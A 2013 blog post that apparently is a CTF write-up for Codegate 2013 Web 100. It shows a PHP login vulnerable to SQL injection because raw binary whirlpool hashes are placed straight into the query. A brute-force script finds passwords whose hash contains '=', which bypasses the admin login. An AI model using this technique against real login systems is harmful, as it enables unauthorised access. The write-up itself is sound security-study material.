Sunday, March 3, 2013

Codegate 2013 Quals - Web 100

We were given the source code of this challenge. To get the flag we have to login as 'admin'. Below is the php code:
$flag = "/flag.txt";
$id = $_POST['user_id'];
$ps = $_POST['password'];
mysql_connect("localhost","codegate","codegate");
mysql_select_db("codegate");

$id = mysql_real_escape_string($id);
$ps = mysql_real_escape_string($ps);

$ps = hash("whirlpool",$ps, true);
$result = mysql_query("select * from users where user_id='$id' and user_ps='$ps'");
$row = mysql_fetch_assoc($result);

if (isset($row['user_id'])) {
 if ($row['user_id'] == "admin") {
  echo "hello, admin<br />";
  die(file_get_contents($flag));
 } else {
  die("hello, ".$row['user_id']);
 }
} else {
 msg("login failed..");
}
The issue with code is that hash() function which outputs raw binary data leading to SQL injection.
string hash ( string $algo , string $data [, bool $raw_output = false ] )
raw_input:
When set to TRUE, outputs raw binary data. FALSE outputs lowercase hexits.
To bypass the login, we need to find a value that when hashed with whirlpool results in string containing '='
<?php
for($i=0 ;$i<10000000; $i++)
    if(strpos(hash("whirlpool",$i, true),"'='") !== false)
        echo $i."\n";
?>
[ctf@renorobert CodeGate]# php brute.php 
364383
527980
629987
708365
991410
1311789
1608604
1974557
^C
Logging in with the above passwords results in login bypass. The flag for the challenge is DAER0NG_DAER0NG_APPLE_TR33

No comments :

Post a Comment